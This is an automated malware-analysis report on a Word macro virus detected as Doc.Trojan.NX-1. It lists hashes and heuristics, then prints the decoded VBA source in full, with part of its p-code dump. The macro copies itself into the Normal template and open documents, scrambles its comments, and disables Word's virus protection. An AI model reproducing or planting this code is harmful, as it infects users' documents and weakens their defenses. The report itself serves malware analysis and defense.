Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 436a0b2ed029b11b…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 32.5 KB
Created: 1999-11-18 07:00:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d6d5cf229b96b0b9fc9f57ea13a71148
SHA-1: 8f2f14bef28e984db90ad394357e5c6ed4122cbf
SHA-256: 436a0b2ed029b11b1f8d593dcb34eab3a42c86cb3af17117ce0fdce611d28378
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, including a Document_Open macro, a common technique for executing code as soon as a document is opened. The macro attempts to copy its own code into the Normal template (NormalTemplate) and into the active document, indicating an intent to persist and to be executed again from later documents. The ClamAV detection 'Doc.Trojan.NX-1' further supports the malicious verdict.

Heuristics (3)

  • ClamAV: Doc.Trojan.NX-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.NX-1
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13714 bytes
SHA-256: 01062a27670dfbdc6bccc146326bb8e1d5a7ad23bd0a3a94c0b125316a33a0e7
Detection: ClamAV: Doc.Trojan.NX-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub A187() ''
'³Ριψ«¬ξ«ΞµΗ�Πο�Θφ°ΉΞίκΝ©ϋΚΣίΟέΕΝτθέΙΞΝ«Ί»ϋ
Dim doc1i As Boolean, doc2i As Boolean ''
'τΜαΩ®ΩΤχ±¬§³φ©¦»ΌχΛμ©©ΐ―ώΈ�©ΏκΉ
doc1i = True: doc2i = True ''
ID = "Private Sub A187() ''" ''
'ΪήΦώ¶νφµ
Set doc1 = NormalTemplate.VBProject.VBComponents(1): Set doc2 = ActiveDocument.VBProject.VBComponents(1) ''
Set h = VBE.ActiveVBProject.VBComponents(1) ''
'ΉώΜΠΟµξΉΖρΟ¨ΔΛ§ΈϋςΫή§ΞµΣΒΤξσΉγΦμχ§�ΘΡϊ―ΥθηθΗηύ²Υ¦ΰΒ®θύΫΖΟ¥γΒ
If doc1.CodeModule.Lines(1, 1) <> ID Then doc1i = False ''
If doc2.CodeModule.Lines(1, 1) <> ID Then doc2i = False ''
'�ΖΟςεωΝέ¨λ·Ώ¥λΌηέρ¬ύ�«ΩθΉίΓγΜΨΫΤ禧κΊΥ―Α
scr = h.CodeModule.Lines(1, h.CodeModule.CountOfLines) ''
'γώ¶υ¶¶ΕσΦϋΌΐΫΤ³άΣ«ΝθρΨ―ωΗΛχ²άξ»Ζ¬ξς
If doc1i = False Then ''
doc1.CodeModule.AddFromString scr ''
End If ''
If doc2i = False Then ''
'―εμηψίΰσ�Δ©¥�Ό½³ΓέΔ¶¶ϊΙαΣΖιάΤήκνόώΡ¬Ψέώ΄Β§ΞΙΝ©――«έηπνΛ―Έψ
doc2.CodeModule.AddFromString scr ''
'σΏµΒΧβΔΦΛµΎΉθχνΏΙ°ΓψΥΘΕ°πΣΰύζ¶ΐη΄ΟΖΩΐτΝ΄μΗςύψ�ΰΑΡΒΔ®ΙΩΕΜ¦ήΑψ»ήώΰ
End If ''
For i = 1 To doc1.CodeModule.CountOfLines ''
lin = doc1.CodeModule.Lines(i, 1) ''
'κΦθπΩ®
com = "" ''
For t = 1 To (70 * Rnd) ''
'°ΏΓίΊΠ¥κΉ·ΩΦ²Μάώσμγ¬ΞΏ·ΐΒοφ�ΈΘΈκο®ΏζΉτιβ«όΑΊΡµ�ϊκρ½΄λΦθ
com = com + Chr(255 - (90 * Rnd)) ''
Next t ''
If Right(lin, 2) <> "''" Then ''
'Δ®ϊί³υγςω¥γΡξλωοΘ�νσ¬ΒμΔ®ΧτΟΔπκΓρεθΎ°ΑΘιΉ¶ύ―Σωΰ®ΉΦΗ«θΤΦϊβιΠ¦ή®ΤΖ
doc1.CodeModule.ReplaceLine i, "'" + com ''
End If ''
'Ν¶Γ�Τ§ΔΈΌόοάΉΉΑ°ΫΈκΉΤΜςΜΈ¶υΌξόΧ¦§ήΜΛΚΖ
Next i ''
For y = 1 To doc2.CodeModule.CountOfLines ''
lin = doc2.CodeModule.Lines(y, 1) ''
com = "" ''
For t = 1 To (70 * Rnd) ''
com = com + Chr(255 - (90 * Rnd)) ''
'Ϋψ§τς¬ΧόΉξΣΕ�¬ΈΡηάΰνΫΓΊΨ
Next t ''
'ρόΜΒΑαδ―ϋΥΡΕ³οδΎΣ
If Right(lin, 2) <> "''" Then ''
doc2.CodeModule.ReplaceLine y, "'" + com ''
End If ''
Next y ''
End Sub ''
'ΐ±³ρΩηλ˻©»ύυ±ΥλΊΦΰ§Λύ±­ΡκΧ²®ΒΝΨΔρς­µχλιΰι΄
Private Sub Document_New(): A187: End Sub ''
Private Sub Document_Open(): A187: Options.VirusProtection = (Rnd): Options.SaveNormalPrompt = (Rnd): Application.EnableCancelKey = wdCancelDisabled: End Sub ''
'ΔΒυΈΞ΄ΤΣζά·¶½όχ�μριΑ¬�τΖΗύ³ΌΕφΩ±ϊ²Ρ»χµΛ―«³πΧΛνΤΙχώι�ϊ²»Κ
Private Sub Document_Close(): A187: P187: End Sub ''
Private Sub P187() ''
'κφ¨ξΡθµ�ΣΌηϋσηΛΎ�λ³Έ¦©ΰΩ±ξιθψΎΪΐ
If Day(Now) = 20 Then ''
Application.Caption = "Who am I?Where am I going?-187.PEACE" ''
'τσύΉΐυλώ»«υΘΨΐΕΌϊύβ�ΖΦΈΠ
Application.Height = 187 ''
'ώΛΘΞϊθΤΡΐ¬±ΫυΏΏΥί«έΐλµ�κμΧοµΈ¬ΰ»«®Ϋ°―λυ§π®Όδ΄βΥά�ΐ§λΗΌΩΤΤΓΥυΦΰ·λωµ
Application.Width = 187 ''
Application.Move 187, 187 ''
'­θµι»έΎ¬¶σ―ά΄υφΚ
MsgBox "187.PEACE", vbSystemModal, "Deo to Peace" ''
'λμγδξ²ψνσΰ΄Υ¬ΧέΞ¶ΏφψέΕΞλ¶χζχη³�ΛΗΛΛίΩ
Rem This Virus is dedicated to Peace(eirhnh) ''
'²ΗΊ
Rem Greetings to everyone int the scene ''
Rem Why? The 187 Family! ''
'ΉδέΥΖΤ²ξεβυδΞύ―ΕΑθΫΔζ©κΕτξΦΧΙΪϊρρ±Ξβϋή²πΰπΠκεκ¦πΒΗβ²»ηχΑ
End If ''
'ι
End Sub ''
Private Sub ShowVBCode(): End Sub ''
'ό¥κϊ
'Υλπ�μδεΑ·ζή½ρ

' Processing file: /opt/analyzer/scan_staging/d784c1876f644e6481a3869539c273e2.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7819 bytes
' Line #0:
' 	FuncDefn (Private Sub A187())
' 	QuoteRem 0x0013 0x0001 "'"
' Line #1:
' 	QuoteRem 0x0000 0x002A "³Ριψ«¬ξ«ΞµΗ�Πο�Θφ°ΉΞίκΝ©ϋΚΣίΟέΕΝτθέΙΞΝ«Ί»ϋ"
' Line #2:
' 	Dim 
' 	VarDefn doc1i (As Boolean)
' 	VarDefn doc2i (As Boolean)
' 	QuoteRem 0x0027 0x0001 "'"
' Line #3:
' 	QuoteRem 0x0000 0x001F "τΜαΩ®ΩΤχ±¬§³φ©¦»ΌχΛμ©©ΐ―ώΈ�©ΏκΉ"
' Line #4:
' 	LitVarSpecial (True)
' 	St doc1i 
' 	BoS 0x0000 
' 	LitVarSpecial (True)
' 	St doc2i 
' 	QuoteRem 0x001B 0x0001 "'"
' Line #5:
' 	LitStr 0x0015 "Private Sub A187() ''"
' 	St ID 
' 	QuoteRem 0x001D 0x0001 "'"
' Line #6:
' 	QuoteRem 0x0000 0x0008 "ΪήΦώ¶νφµ"
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set doc1 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0
... (truncated)